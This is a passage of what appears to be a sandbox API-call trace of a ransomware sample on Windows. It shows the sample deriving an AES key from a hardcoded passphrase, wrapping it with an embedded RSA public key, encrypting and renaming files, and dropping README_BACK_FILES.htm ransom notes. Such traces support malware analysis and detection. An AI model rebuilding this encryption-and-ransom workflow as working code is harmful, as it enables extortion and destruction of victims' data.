Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg", dwFileAttributes=0x2) returned 0 [0239.532] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.534] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.534] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.534] CryptHashData (hHash=0x28beb58, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.534] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28beb58, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bee18) returned 1 [0239.534] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.534] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.535] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aca48) returned 1 [0239.535] CryptImportPublicKeyInfo (in: hCryptProv=0x28aca48, dwCertEncodingType=0x1, pInfo=0x2899730*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899760*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899768*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28beb98) returned 1 [0239.535] CryptEncrypt (in: hKey=0x28beb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.535] CryptEncrypt (in: hKey=0x28beb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28acad0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28acad0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.535] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28acad0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.535] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.535] CryptEncrypt (in: hKey=0x28bee18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.536] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.536] CloseHandle (hObject=0xffffffff) returned 1 [0239.536] CloseHandle (hObject=0xffffffff) returned 1 [0239.536] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), bFailIfExists=0) returned 0 [0239.536] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man", dwFileAttributes=0x0) returned 0 [0239.537] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg")) returned 0 [0239.537] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.fuck")) returned 0 [0239.538] CryptDestroyHash (hHash=0x28beb58) returned 1 [0239.538] CryptDestroyKey (hKey=0x28bee18) returned 1 [0239.538] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.538] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.538] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.538] GetLastError () returned 0x5 [0239.538] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man")) returned 0x20 [0239.538] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man", dwFileAttributes=0x80) returned 0 [0239.538] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.539] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.539] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg", dwFileAttributes=0x2) returned 0 [0239.540] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.543] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.543] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.543] CryptHashData (hHash=0x28bf018, pbData=0x2856f48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.543] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28becd8) returned 1 [0239.543] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.543] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.543] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28acc68) returned 1 [0239.544] CryptImportPublicKeyInfo (in: hCryptProv=0x28acc68, dwCertEncodingType=0x1, pInfo=0x2899320*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899350*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899358*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bedd8) returned 1 [0239.544] CryptEncrypt (in: hKey=0x28bedd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.544] CryptEncrypt (in: hKey=0x28bedd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28adbd0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28adbd0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.544] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28adbd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.544] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.544] CryptEncrypt (in: hKey=0x28becd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.544] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.544] CloseHandle (hObject=0xffffffff) returned 1 [0239.544] CloseHandle (hObject=0xffffffff) returned 1 [0239.544] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), bFailIfExists=0) returned 0 [0239.545] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man", dwFileAttributes=0x0) returned 0 [0239.545] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg")) returned 0 [0239.546] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.fuck")) returned 0 [0239.546] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.546] CryptDestroyKey (hKey=0x28becd8) returned 1 [0239.546] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.546] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.546] FindClose (in: hFindFile=0x2893cf0 | out: hFindFile=0x2893cf0) returned 1 [0239.546] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm")) returned 0xffffffff [0239.547] AreFileApisANSI () returned 1 [0239.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0239.547] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.547] GetLastError () returned 0x5 [0239.547] GetLastError () returned 0x5 [0239.547] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.547] FindClose (in: hFindFile=0x282de78 | out: hFindFile=0x282de78) returned 1 [0239.547] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\readme_back_files.htm")) returned 0xffffffff [0239.547] AreFileApisANSI () returned 1 [0239.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0239.547] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.548] GetLastError () returned 0x5 [0239.548] GetLastError () returned 0x5 [0239.548] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.548] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bee58 [0239.548] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.548] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.548] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bee98 [0239.548] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.548] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.548] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf098 [0239.548] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.549] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.549] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.549] FindClose (in: hFindFile=0x28bf098 | out: hFindFile=0x28bf098) returned 1 [0239.549] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\readme_back_files.htm")) returned 0x20 [0239.549] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.549] FindClose (in: hFindFile=0x28bee98 | out: hFindFile=0x28bee98) returned 1 [0239.549] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\DSS\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\readme_back_files.htm")) returned 0xffffffff [0239.549] AreFileApisANSI () returned 1 [0239.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ccf98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0239.549] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\DSS\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.550] GetLastError () returned 0x5 [0239.550] GetLastError () returned 0x5 [0239.550] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.550] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bea98 [0239.550] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.550] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.550] FindClose (in: hFindFile=0x28bea98 | out: hFindFile=0x28bea98) returned 1 [0239.550] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\Keys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\readme_back_files.htm")) returned 0xffffffff [0239.550] AreFileApisANSI () returned 1 [0239.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0239.550] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\Keys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.551] GetLastError () returned 0x5 [0239.551] GetLastError () returned 0x5 [0239.551] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.551] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bec98 [0239.551] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.551] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.551] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.551] FindClose (in: hFindFile=0x28bec98 | out: hFindFile=0x28bec98) returned 1 [0239.551] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\readme_back_files.htm")) returned 0xffffffff [0239.551] AreFileApisANSI () returned 1 [0239.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0239.551] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.552] GetLastError () returned 0x5 [0239.552] GetLastError () returned 0x5 [0239.552] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.552] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bee98 [0239.552] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.552] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.552] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28beed8 [0239.552] FindNextFileA (in: hFindFile=0x28beed8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.552] FindNextFileA (in: hFindFile=0x28beed8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.552] FindNextFileA (in: hFindFile=0x28beed8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.552] FindClose (in: hFindFile=0x28beed8 | out: hFindFile=0x28beed8) returned 1 [0239.552] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\readme_back_files.htm")) returned 0x20 [0239.553] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.553] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0xffffffff [0239.553] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\readme_back_files.htm")) returned 0xffffffff [0239.553] AreFileApisANSI () returned 1 [0239.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f69a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0239.553] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.553] GetLastError () returned 0x5 [0239.553] GetLastError () returned 0x5 [0239.553] FindNextFileA (in: hFindFile=0x28bee98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.553] FindClose (in: hFindFile=0x28bee98 | out: hFindFile=0x28bee98) returned 1 [0239.558] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\readme_back_files.htm")) returned 0xffffffff [0239.558] AreFileApisANSI () returned 1 [0239.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd070, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0239.558] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\RSA\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.559] GetLastError () returned 0x5 [0239.559] GetLastError () returned 0x5 [0239.559] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.559] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0239.559] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\readme_back_files.htm")) returned 0xffffffff [0239.559] AreFileApisANSI () returned 1 [0239.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6b08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0239.559] CreateFileW (lpFileName="C:\\\\Users\\All 